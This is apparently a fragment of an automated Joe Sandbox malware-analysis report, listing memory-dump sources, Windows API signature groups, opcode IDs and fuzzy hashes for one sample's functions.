                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                            • Instruction ID: 8937792e3c0e7127d8087fb9457a6283aaa9b599cdea889644b36d4af4b9c184
                                                            • Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                            • Instruction Fuzzy Hash: 3531D73660868587EB10DF19F4441A9B3A1F788BA8F850235EE9D87798CF3CE845C750
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                            • String ID:
                                                            • API String ID: 2256411358-0
                                                            • Opcode ID: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                            • Instruction ID: 25603884b2cf0f78a4ae4295330b0110b041e4fe635bf4ab859a30adf76e330b
                                                            • Opcode Fuzzy Hash: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                            • Instruction Fuzzy Hash: 9C4189A1E8C2C786FFA0EF24B4987F9A690AF44B48F9C0135D64D461E4CF2EE4818731
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                            • String ID:
                                                            • API String ID: 2655805287-0
                                                            • Opcode ID: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                            • Instruction ID: 3401068533eeec42b462c055893c169126779aeeac759a658d10915e84117f02
                                                            • Opcode Fuzzy Hash: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                            • Instruction Fuzzy Hash: B921F922B097C285EF04EB12B9041B5A690FF89FE0F894530EE1E57B91DF3CD8508320
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$ForegroundPixelRelease
                                                            • String ID:
                                                            • API String ID: 4156661090-0
                                                            • Opcode ID: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                            • Instruction ID: bf0c68dfa5dd64f88d0767db1b04385dea8044a8c922c5d102fea41b48dc72a5
                                                            • Opcode Fuzzy Hash: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                            • Instruction Fuzzy Hash: 66214122B0869186EF04EF26F8941ADE7A1FB88F90B494039DE5E87755DF78D4428760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2067211477-0
                                                            • Opcode ID: 5a03c1e74c727ad6943a6aafe1eddabbbd93acb60c7f9608f7f9e8f5502f6952
                                                            • Instruction ID: 16529d5b770d32b69339731b28cc5b622cc9401d018d49e53ac37694ad5ff012
                                                            • Opcode Fuzzy Hash: 5a03c1e74c727ad6943a6aafe1eddabbbd93acb60c7f9608f7f9e8f5502f6952
                                                            • Instruction Fuzzy Hash: 68215E25A0A7C286EF18EF65B4500F9E2A0AF84B90F8C4530EA4E57795DF3CE805C630
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                            • Instruction ID: f687ee34014e20aeeb24069fa5933ac9f72f0243b05e92dbdad86b1fc88c3b59
                                                            • Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                            • Instruction Fuzzy Hash: 79119126E1E68345FE543539F4463F791417F543A0F9D4234EA6E466DACF1CAC4381B0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                            • String ID:
                                                            • API String ID: 2117695475-0
                                                            • Opcode ID: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                            • Instruction ID: 19ebd8ed3ce07e76b4002bc5826b50ff8d7314321be824830e642ecaaed03c0a
                                                            • Opcode Fuzzy Hash: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                            • Instruction Fuzzy Hash: 71113600E091D385FE5877F278662F8A2854F95709FCC0438E95E9AAD3EF1CA8458636
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                            • Instruction ID: b55bf5fa9039dd9d0bc078666cc86a46ae8b21d7ffbf3d84fd3a169c52e21d85
                                                            • Opcode Fuzzy Hash: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                            • Instruction Fuzzy Hash: 0B114F36604B91C6EB10EF52F844599B7A4FB88FD0B594536DF8943714DF38E415C750
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                            • Instruction ID: 8485a508448c8ac1f999c55bf3c3d910e82c1755409b49259301e19f80057059
                                                            • Opcode Fuzzy Hash: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                            • Instruction Fuzzy Hash: B2113636604B91C6EB10EF12F884599BBB4FB88BD0B994539DF8843B14DF38E4168750
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                            • Instruction ID: d856dd66448d0ba8980bcf76a79b82134da864a679b1ea3bf0f578f39d97cc80
                                                            • Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                            • Instruction Fuzzy Hash: F2113025609AC286EB00EB66F4403B9A2A4EF85BC0F9C4034DF8E47758DF7DD4418760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                            • Instruction ID: 1befb9258f7f6d6476ee2cdf94b2c707841e65b4ecdd78c58460054d78a59faa
                                                            • Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                            • Instruction Fuzzy Hash: DC116922A085C2C1EF66AF24F4543B99364FF84B45F884035DA4E4A294DF7CD98AC730
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                            • Instruction ID: a308d417cd869972b3e4ff744862d23f8cf1d47c571c2ce2c8da9afcc8d0163a
                                                            • Opcode Fuzzy Hash: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                            • Instruction Fuzzy Hash: 3C01D421A18A82C2EF09AB36F8D407DE360AF957C1B9C0235E20F91664DF2CE895C630
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?,?,?,00007FF75F1A29AD,?,?,?,00007FF75F152AB2), ref: 00007FF75F1C003C
                                                            • TerminateThread.KERNEL32(?,?,?,00007FF75F1A29AD,?,?,?,00007FF75F152AB2), ref: 00007FF75F1C0047
                                                            • WaitForSingleObject.KERNEL32(?,?,?,00007FF75F1A29AD,?,?,?,00007FF75F152AB2), ref: 00007FF75F1C0055
                                                            • ~SyncLockT.VCCORLIB ref: 00007FF75F1C005E
                                                              • Part of subcall function 00007FF75F1BF7B8: CloseHandle.KERNEL32(?,?,?,00007FF75F1C0063,?,?,?,00007FF75F1A29AD,?,?,?,00007FF75F152AB2), ref: 00007FF75F1BF7C9
                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00007FF75F1A29AD,?,?,?,00007FF75F152AB2), ref: 00007FF75F1C006A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3142591903-0
                                                            • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                            • Instruction ID: 42ee12fe57dee45fb09e44e4d50f82bbdb316685d1be0f003369449554a28d84
                                                            • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                            • Instruction Fuzzy Hash: 4B014C3AA08B81C6EB00AF15F484269B360FB98B90F584035DB8D43B55DF3CD892C760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ErrorExitLastThread
                                                            • String ID:
                                                            • API String ID: 1611280651-0
                                                            • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                            • Instruction ID: f680b4a7b05483af4e931f89fa44d431fa4c66667b6a396a2fa87b810fcf6d00
                                                            • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                            • Instruction Fuzzy Hash: A9012C21B096C292EF147B20E5881BCA661FF40B75FD81735C63E126D6DF2CA8598320
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                            • String ID:
                                                            • API String ID: 179993514-0
                                                            • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                            • Instruction ID: 67ceec54d62a5a7baa9ed0d57fbf614dee22ce6308c896fff6d14ab8ed70fc57
                                                            • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                            • Instruction Fuzzy Hash: BBF03910F1868283FF547BB279C82F892966F88741FCC9034CA0A42691DF6DA89B8670
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize
                                                            • String ID: .lnk
                                                            • API String ID: 948891078-24824748
                                                            • Opcode ID: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                            • Instruction ID: 7a1af13a4c0c905a8c46916fa893228737e8a8787004745327abfb50ea75dd76
                                                            • Opcode Fuzzy Hash: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                            • Instruction Fuzzy Hash: B9D17062B18A8681EF10FF15E4946EDAB60FB80B84F845032EE4E47B69EF3CD545C760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                            • API String ID: 3215553584-1196891531
                                                            • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                            • Instruction ID: 7b7b379d15e1a70e3250af5f877cbd8759acdab3c7fda6340d36cd4d35dc672e
                                                            • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                            • Instruction Fuzzy Hash: 8181B272E0828A85FF647F35B7502FDAAA1AF11794F8C4035DA0E53684DF6DE950D223
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                            • Instruction ID: 34273241a409f149c9abaa3f82692fa989d0fa52955f57d724dad91095ae55ab
                                                            • Opcode Fuzzy Hash: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                            • Instruction Fuzzy Hash: 47615572E1C2C286EF65EF24A2553BCB7A0EB45B18F9C1139CA4A45599CF2CE481C721
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                            • Instruction ID: 940c60776e870acf9d4e9b0b8bba694d6d103ee5d0121a9babff1b00a9837b29
                                                            • Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                            • Instruction Fuzzy Hash: 2851BE3261968192DB20EB52F484AEAF761F7C8B84F891031EE8E53B49DF7CD905CB50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
